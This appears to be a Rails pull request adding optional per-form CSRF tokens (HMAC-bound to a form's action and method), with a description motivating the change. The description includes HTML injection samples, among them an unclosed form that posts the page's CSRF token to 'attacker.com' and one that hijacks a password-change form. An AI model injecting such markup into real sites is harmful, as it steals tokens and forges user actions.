### PR TITLE
Per-form CSRF tokens

### DIFF
--- a/actionpack/CHANGELOG.md
+++ b/actionpack/CHANGELOG.md
@@ -1,3 +1,7 @@
+*   Add option for per-form CSRF tokens.
+
+    *Ben Toews*
+
 *   Add tests and documentation for `ActionController::Renderers::use_renderers`.
 
     *Benjamin Fleischer*

--- a/actionpack/lib/action_controller/metal/request_forgery_protection.rb
+++ b/actionpack/lib/action_controller/metal/request_forgery_protection.rb
@@ -81,6 +81,10 @@ module ActionController #:nodoc:
       config_accessor :forgery_protection_origin_check
       self.forgery_protection_origin_check = false
 
+      # Controls whether form-action/method specific CSRF tokens are used.
+      config_accessor :per_form_csrf_tokens
+      self.per_form_csrf_tokens = false
+
       helper_method :form_authenticity_token
       helper_method :protect_against_forgery?
     end
@@ -277,16 +281,25 @@ module ActionController #:nodoc:
       end
 
       # Sets the token value for the current session.
-      def form_authenticity_token
-        masked_authenticity_token(session)
+      def form_authenticity_token(form_options: {})
+        masked_authenticity_token(session, form_options: form_options)
       end
 
       # Creates a masked version of the authenticity token that varies
       # on each request. The masking is used to mitigate SSL attacks
       # like BREACH.
-      def masked_authenticity_token(session)
+      def masked_authenticity_token(session, form_options: {})
+        action, method = form_options.values_at(:action, :method)
+
+        raw_token = if per_form_csrf_tokens && action && method
+          action_path = normalize_action_path(action)
+          per_form_csrf_token(session, action_path, method)
+        else
+          real_csrf_token(session)
+        end
+
         one_time_pad = SecureRandom.random_bytes(AUTHENTICITY_TOKEN_LENGTH)
-        encrypted_csrf_token = xor_byte_strings(one_time_pad, real_csrf_token(session))
+        encrypted_csrf_token = xor_byte_strings(one_time_pad, raw_token)
         masked_token = one_time_pad + encrypted_csrf_token
         Base64.strict_encode64(masked_token)
       end
@@ -316,26 +329,52 @@ module ActionController #:nodoc:
           compare_with_real_token masked_token, session
 
         elsif masked_token.length == AUTHENTICITY_TOKEN_LENGTH * 2
-          # Split the token into the one-time pad and the encrypted
-          # value and decrypt it
-          one_time_pad = masked_token[0...AUTHENTICITY_TOKEN_LENGTH]
-          encrypted_csrf_token = masked_token[AUTHENTICITY_TOKEN_LENGTH..-1]
-          csrf_token = xor_byte_strings(one_time_pad, encrypted_csrf_token)
+          csrf_token = unmask_token(masked_token)
 
-          compare_with_real_token csrf_token, session
-
+          compare_with_real_token(csrf_token, session) ||
+            valid_per_form_csrf_token?(csrf_token, session)
         else
           false # Token is malformed
         end
+      end
+
+      def unmask_token(masked_token)
+        # Split the token into the one-time pad and the encrypted
+        # value and decrypt it
+        one_time_pad = masked_token[0...AUTHENTICITY_TOKEN_LENGTH]
+        encrypted_csrf_token = masked_token[AUTHENTICITY_TOKEN_LENGTH..-1]
+        xor_byte_strings(one_time_pad, encrypted_csrf_token)
       end
 
       def compare_with_real_token(token, session)
         ActiveSupport::SecurityUtils.secure_compare(token, real_csrf_token(session))
       end
 
+      def valid_per_form_csrf_token?(token, session)
+        if per_form_csrf_tokens
+          correct_token = per_form_csrf_token(
+            session,
+            normalize_action_path(request.fullpath),
+            request.request_method
+          )
+
+          ActiveSupport::SecurityUtils.secure_compare(token, correct_token)
+        else
+          false
+        end
+      end
+
       def real_csrf_token(session)
         session[:_csrf_token] ||= SecureRandom.base64(AUTHENTICITY_TOKEN_LENGTH)
         Base64.strict_decode64(session[:_csrf_token])
+      end
+
+      def per_form_csrf_token(session, action_path, method)
+        OpenSSL::HMAC.digest(
+          OpenSSL::Digest::SHA256.new,
+          real_csrf_token(session),
+          [action_path, method.downcase].join("#")
+        )
       end
 
       def xor_byte_strings(s1, s2)
@@ -361,6 +400,10 @@ module ActionController #:nodoc:
         else
           true
         end
+      end
+
+      def normalize_action_path(action_path)
+        action_path.split('?').first.to_s.chomp('/')
       end
   end
 end

--- a/actionview/lib/action_view/helpers/form_tag_helper.rb
+++ b/actionview/lib/action_view/helpers/form_tag_helper.rb
@@ -870,10 +870,16 @@ module ActionView
               ''
             when /^post$/i, "", nil
               html_options["method"] = "post"
-              token_tag(authenticity_token)
+              token_tag(authenticity_token, form_options: {
+                action: html_options["action"],
+                method: "post"
+              })
             else
               html_options["method"] = "post"
-              method_tag(method) + token_tag(authenticity_token)
+              method_tag(method) + token_tag(authenticity_token, form_options: {
+                action: html_options["action"],
+                method: method
+              })
           end
 
           if html_options.delete("enforce_utf8") { true }

--- a/actionview/lib/action_view/helpers/url_helper.rb
+++ b/actionview/lib/action_view/helpers/url_helper.rb
@@ -311,7 +311,11 @@ module ActionView
         form_options[:action] = url
         form_options[:'data-remote'] = true if remote
 
-        request_token_tag = form_method == 'post' ? token_tag : ''
+        request_token_tag = if form_method == 'post'
+          token_tag(nil, form_options: form_options)
+        else
+          ''
+        end
 
         html_options = convert_options_to_data_attributes(options, html_options)
         html_options['type'] = 'submit'
@@ -579,9 +583,9 @@ module ActionView
           html_options["data-method"] = method
         end
 
-        def token_tag(token=nil)
+        def token_tag(token=nil, form_options: {})
           if token != false && protect_against_forgery?
-            token ||= form_authenticity_token
+            token ||= form_authenticity_token(form_options: form_options)
             tag(:input, type: "hidden", name: request_forgery_protection_token.to_s, value: token)
           else
             ''

--- a/actionview/test/template/url_helper_test.rb
+++ b/actionview/test/template/url_helper_test.rb
@@ -582,7 +582,7 @@ class UrlHelperTest < ActiveSupport::TestCase
     self.request_forgery
   end
 
-  def form_authenticity_token
+  def form_authenticity_token(*args)
     "secret"
   end
 

--- a/guides/source/configuring.md
+++ b/guides/source/configuring.md
@@ -345,6 +345,8 @@ The schema dumper adds one additional configuration option:
 
 * `config.action_controller.forgery_protection_origin_check` configures whether the HTTP `Origin` header should be checked against the site's origin as an additional CSRF defense.
 
+* `config.action_controller.per_form_csrf_tokens` configures whether CSRF tokens are only valid for the method/action they were generated for.
+
 * `config.action_controller.relative_url_root` can be used to tell Rails that you are [deploying to a subdirectory](configuring.html#deploy-to-a-subdirectory-relative-url-root). The default is `ENV['RAILS_RELATIVE_URL_ROOT']`.
 
 * `config.action_controller.permit_all_parameters` sets all the parameters for mass assignment to be permitted by default. The default value is `false`.

--- a/railties/lib/rails/generators/rails/app/templates/config/initializers/per_form_csrf_tokens.rb
+++ b/railties/lib/rails/generators/rails/app/templates/config/initializers/per_form_csrf_tokens.rb
@@ -1,0 +1,4 @@
+# Be sure to restart your server when you modify this file.
+
+# Enable per-form CSRF tokens.
+Rails.application.config.action_controller.per_form_csrf_tokens = true

--- a/railties/test/application/configuration_test.rb
+++ b/railties/test/application/configuration_test.rb
@@ -657,7 +657,7 @@ module ApplicationTests
 
         private
 
-        def form_authenticity_token; token; end # stub the authenticy token
+        def form_authenticity_token(*args); token; end # stub the authenticy token
       end
       RUBY
 


### PR DESCRIPTION
For sites using CSP, one of the biggest risks of content-injection is form hijacking. For example, on a page like

``` html
<!-- some xss vulnerability here -->
<form method="post" action="/innocuous">
 <input type="hidden" name="authenticity_token" value="thetoken">
</form>
```

an attacker can inject their own unclosed form tag.

``` html
<form method="post" action="//attacker.com/tokens"><!-- xss -->
<form method="post" action="/innocuous">
 <input type="hidden" name="authenticity_token" value="thetoken">
</form>
```

Because nested form elements aren't allowed in HTML, the attacker's tag will supersede the legitimate one and inherit its CSRF token input tag. If the form is submitted, the CSRF token will go to `attacker.com`.

This can be largely mitigated by using CSP with the `form-action` directive, to specify that forms cannot be posted cross-origin. An attacker with a content-injection vulnerability is then limited to hijacking forms to make same-origin requests. This can unfortunately still be quite impactful:

``` html
<form method="post" action="/user/change_password"><!-- xss -->
<form method="post" action="/innocuous">
 <input type="hidden" name="authenticity_token" value="thetoken">
</form>
```

One mitigation for this kind of attack is to require that every form tag have a nonce that matches a value in some meta tag. We currently implement this method at GitHub using JavaScript to detect/delete injected form tags. https://github.com/w3c/webappsec-csp/issues/20 is a proposal to add this mitigation to CSP itself.

Another mitigation would be to have each CSRF token be valid only for the method/action of the form it was included in. We wrote an implementation of this for our fork of Rails and would like to forwardport/upstream the feature if there is interest. Unfortunately, the BREACH mitigation we wrote (https://github.com/rails/rails/pull/16570 took too long) is fairly different from the upstream one and our per-form CSRF token changes don't apply cleanly.

The questions I have for @rails/security are:
1. The attack described here is very niche. Is this worth upstreaming?
2. Would you want it to be backwards compatible (are API changes okay)?

If it's deemed worthwhile, I'll be happy to try to port our changes to this branch, but I wanted to ask before putting in the effort. https://github.com/rails/rails/commit/f9a1bfb871ed4e991a5619d49387e46578ea5894 lays much of the groundwork by passing the form method/action to `form_authenticity_token`. Even if per-form CSRF tokens aren't added to mainstream Rails, we'd love to see that commit merged to reduce the monkey patching required for our implementation and to make it easier for others to implement themselves.

/cc @ptoomey3 @oreoshake @gregose
Further reading on CSP bypasses: http://lcamtuf.coredump.cx/postxss/ http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/
